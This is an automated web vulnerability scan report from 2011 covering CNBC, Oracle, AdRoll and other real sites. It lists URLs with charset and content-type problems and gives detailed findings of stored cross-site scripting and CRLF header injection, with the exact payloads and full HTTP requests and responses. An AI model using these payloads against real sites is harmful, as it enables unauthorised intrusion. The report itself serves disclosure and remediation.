27.27. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

27.28. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

27.29. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js

27.30. https://register.cnbc.com/

27.31. https://register.cnbc.com/email/EmailSupport.jsp

27.32. https://shop.oracle.com/pls/ostore/f

27.33. https://support.oracle.com/

27.34. https://support.oracle.com/CSP/ui/blank.html

27.35. https://support.oracle.com/CSP/ui/flash.html

27.36. https://support.oracle.com/CSP/ui/xml/sunConnect.html

27.37. https://www.atg.com/dojo-1/dijit/nls/loading.js

27.38. https://www.atg.com/favicon.ico

27.39. https://www.cvs.com/CVSApp/html/blank.html

27.40. https://www.cvs.com/CVSApp/user/forgot_password.jsp

27.41. https://www.cvs.com/CVSApp/user/login.jsp

28. Multiple content types specified

29. HTML does not specify charset

29.1. http://a.tribalfusion.com/i.cid

29.2. http://a.tribalfusion.com/j.ad

29.3. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

29.4. http://a.tribalfusion.com/z/i.cid

29.5. http://ad.doubleclick.net/adi/N3643.196990.READWRITEWEB.COM/B5659394

29.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38

29.7. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2

29.8. http://ad.doubleclick.net/clk

29.9. http://ads.pointroll.com/PortalServe/

29.10. http://api-cdn.cnbc.com/api/chart/chart.asp

29.11. http://api.cnbc.com/api/chart/chart.asp

29.12. http://api.cnbc.com/api/movers/movers.asp

29.13. http://apps.cnbc.com/

29.14. http://apps.cnbc.com/Includes/CheckPng/Script.asp

29.15. http://apps.cnbc.com/company/quote/incchart.asp

29.16. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

29.17. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

29.18. http://blog.harbottle.com/dm/xmlrpc.php

29.19. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js

29.20. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

29.21. http://blogs.oracle.com/otn/resource/SunOracle.png

29.22. http://blogs.oracle.com/otn/resource/java-logo.png

29.23. http://blogs.oracle.com/theme/scripts/clientSideInclude.js

29.24. http://blogs.oracle.com/theme/scripts/roller.js

29.25. http://c.brightcove.com/services/messagebroker/amf

29.26. http://cdn.krxd.net/kruxcontent/krux_iframe.html

29.27. http://cdn5.tribalfusion.com/media/1956006/frame.html

29.28. http://cdn5.tribalfusion.com/media/2516896//frm.html

29.29. http://ds.addthis.com/red/psi/sites/www.dove.us/p.json

29.30. http://fls.doubleclick.net/activityi

29.31. http://install.volusion.com/installer/demos/Empty.htm

29.32. http://js.adsonar.com/js/pass.html

29.33. https://login.cnbc.com/

29.34. http://m.cnbc.com/mytest/ipecho.php

29.35. https://myprofile.oracle.com/EndUser/images/fading-background.png

29.36. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

29.37. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

29.38. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

29.39. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

29.40. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

29.41. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.42. http://optimized-by.rubiconproject.com/a/dk.html

29.43. http://pro.cnbc.com/

29.44. http://pro.cnbc.com/index.asp

29.45. https://register.cnbc.com/

29.46. https://register.cnbc.com/RandomImage.jsp

29.47. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

29.48. https://support.oracle.com/

29.49. https://support.oracle.com/CSP/ui/xml/sunConnect.html

29.50. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

29.51. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

29.52. http://tf.nexac.com/media/1809966/na.html

29.53. http://ticker.cnbc.com/

29.54. http://tps31.doubleverify.com/visit.js

29.55. http://uac.advertising.com/wrapper/aceUACping.htm

29.56. http://videometa.cnbc.com/getadmincontent.do

29.57. http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478

29.58. http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994

29.59. http://view.atdmt.com/FXM/iview/308880957/direct/01/466318

29.60. http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911

29.61. http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867

29.62. http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540

29.63. http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761

29.64. http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182

29.65. http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164

29.66. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

29.67. http://wd.sharethis.com/api/getCount2.php

29.68. http://www.bigcommerce.com/freetrial.php

29.69. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

29.70. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

29.71. http://www.gillettevenus.com/en_US/images/go_roll.png

29.72. http://www.gillettevenus.com/global/blank.html

29.73. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

29.74. http://www.harbottle.com/hnl/pages/hnl_search2.php/a

29.75. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

29.76. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

29.77. http://www.rayalab.com/Scripts/AC_RunActiveContent.js

29.78. http://www.rayalab.com/animate.js

29.79. http://www.rayalab.com/favicon.ico

29.80. http://www.rayalab.com/flexcroll.js

29.81. http://www.resourcepoint.net/form.htm

29.82. http://www.revsolutionsinc.com/animated_favicon1.gif

29.83. http://www.sophelle.com/graphic/bullet-sm-w.gif

29.84. http://www.sophelle.com/images/sophelle-ico.ico

30. HTML uses unrecognised charset

31. Content type incorrectly stated

31.1. http://4qinvite.4q.iperceptions.com/1.aspx

31.2. http://a1.interclick.com/getInPageJS.aspx

31.3. http://a1.interclick.com/getInPageJSProcess.aspx

31.4. https://account.bigcommerce.com/mailer/form.php

31.5. http://ad.doubleclick.net/clk

31.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

31.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

31.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

31.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

31.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

31.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

31.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

31.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

31.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

31.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

31.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

31.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

31.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

31.19. http://ads.pointroll.com/PortalServe/

31.20. http://api-cdn.cnbc.com/api/chart/chart.asp

31.21. http://api.cnbc.com/api/chart/chart.asp

31.22. http://api.viglink.com/api/ping

31.23. http://apps.cnbc.com/Includes/CheckPng/Script.asp

31.24. http://assets1.csc.com/contact_us/media/contact_us4.css

31.25. http://assets1.csc.com/services/media/services3.css

31.26. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

31.27. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

31.28. http://blog.harbottle.com/dm/xmlrpc.php

31.29. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js

31.30. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

31.31. http://blogs.oracle.com/otn/resource/SunOracle.png

31.32. http://blogs.oracle.com/otn/resource/java-logo.png

31.33. http://blogs.oracle.com/theme/scripts/clientSideInclude.js

31.34. http://blogs.oracle.com/theme/scripts/roller.js

31.35. http://content.plymedia.com/initialize

31.36. http://dynpages-mktas.oracle.com/pls/ebn/swf_viewer.load

31.37. http://education.oracle.com/education/css/oracle.css

31.38. http://education.oracle.com/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries

31.39. https://event.on24.com/eventRegistration/prereg/register.jsp

31.40. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

31.41. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

31.42. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

31.43. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

31.44. https://forums.oracle.com/forums/themes/english/resources/s_code.js

31.45. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

31.46. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

31.47. https://forums.oracle.com/forums/themes/english/resources/style.css

31.48. http://goku.brightcove.com/1pix.gif

31.49. http://imp.fetchback.com/serve/fb/adtag.js

31.50. http://l.apture.com/v3/

31.51. http://m.cnbc.com/mytest/ipecho.php

31.52. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share.jpg/

31.53. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/

31.54. http://media.cnbc.com/i/CNBC/CNBC_Images/video/vid_control_/

31.55. http://media.cnbc.com/i/CNBC/Components/FlashVideo/flashVideoPlayerv81

31.56. http://media.cnbc.com/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14

31.57. http://media.cnbc.com/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel

31.58. https://myprofile.oracle.com/EndUser/images/fading-background.png

31.59. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

31.60. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

31.61. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

31.62. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

31.63. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

31.64. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

31.65. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

31.66. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.67. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js

31.68. http://ping.crowdscience.com/ping.js

31.69. http://pixel.fetchback.com/serve/fb/pdc

31.70. https://register.cnbc.com/RandomImage.jsp

31.71. http://rt.disqus.com/forums/realtime-cached.js

31.72. http://rt.legolas-media.com/lgrt

31.73. http://rww.readwriteweb.netdna-cdn.com/favicon.ico

31.74. http://s7.addthis.com/js/addthis_widget.php

31.75. http://server.iad.liveperson.net/hcp/html/mTag.js

31.76. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

31.77. http://sophelle.app5.hubspot.com/salog.js.aspx

31.78. http://subplyevents.cloudapp.net/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.79. http://subplyevents.cloudapp.net/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.80. http://subplyevents.cloudapp.net/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.81. http://subplyevents.cloudapp.net/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.82. http://tps31.doubleverify.com/visit.js

31.83. http://wd.sharethis.com/api/getCount2.php

31.84. http://www.atg.com/favicon.ico

31.85. http://www.atg.com/svc-common/script/propertyFunc.js.jsp

31.86. https://www.atg.com/favicon.ico

31.87. https://www.atg.com/svc-common/script/propertyFunc.js.jsp

31.88. http://www.cnbc.com/id/24596694/

31.89. http://www.facebook.com/extern/login_status.php

31.90. http://www.fekkai.com/js/imageLoader.json

31.91. http://www.gillettevenus.com/favicon.ico

31.92. http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js

31.93. http://www.google.com/search

31.94. http://www.harbottle.com/favicon.ico

31.95. http://www.marykay.com/images/icn_fb.jpg

31.96. http://www.marykay.com/images/icn_yt.jpg

31.97. http://www.netsuite.com/portal/javascript/effects.js

31.98. http://www.netsuite.com/portal/javascript/prototype.js

31.99. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg

31.100. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg

31.101. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg

31.102. http://www.oracle.com/pls/ebn/live_viewer.main

31.103. http://www.oracle.com/pls/ebn/swf_viewer.load

31.104. http://www.oracle.com/pls/ebn/wm_viewer.main

31.105. http://www.sophelle.com/graphic/cq_logo-250.gif

32. Content type is not specified

32.1. http://ads.pointroll.com/PortalServe/

32.2. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

32.3. https://login.oracle.com/mysso/sso_loginui/sso_check.js

32.4. https://login.oracle.com/oam/server/sso/auth_cred_submit

32.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

32.6. http://www.deloitte.com/deloitte-portal-selfservice/jquery.showLoading.js

32.7. http://www.deloitte.com/deloitte-portal-selfservice/scripts/checkbox-style.js

32.8. http://www.deloitte.com/deloitte-portal-selfservice/selfservice-api.js

1. Cross-site scripting (stored)

Summary

Severity: High
Confidence: Certain
Host: http://snas.nbcuni.com
Path: /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a5fc9<script>alert(1)</script>0f409039ab9 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9

Request 2

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:21 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

2. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 752c7%0d%0afa8ce4cf6fd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/752c7%0d%0afa8ce4cf6fd/3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:47 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/752c7
fa8ce4cf6fd
/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 36bd2%0d%0a9786dda38d3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/36bd2%0d%0a9786dda38d3?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:48 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/EBPLYDUJ5RCZ3C7MBENLBV/36bd2
9786dda38d3
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /tpauth/rest/authenticate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 294ce%0d%0adc6a298c2de was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=subscription&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce%0d%0adc6a298c2de=1 HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:29 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=D2C022C9CFF6DFB9157CD240DA8DE1A9; Path=/tpauth
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce
dc6a298c2de
=1&login_view=subscription
Content-Length: 0
Content-Type: text/plain


2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /tpauth/rest/authenticate

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 33200%0d%0a0f3f561d3b4 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=33200%0d%0a0f3f561d3b4&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=33200
0f3f561d3b4

Content-Length: 0
Content-Type: text/plain


2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /memberCenter.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ef6d%0d%0a743079059dd was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /memberCenter.do?4ef6d%0d%0a743079059dd=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:52 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&4ef6d
743079059dd
=1&login_view=register
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:52 GMT; path=/


2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d0ea7%0d%0a3c7455c6879 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/&d0ea7%0d%0a3c7455c6879=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
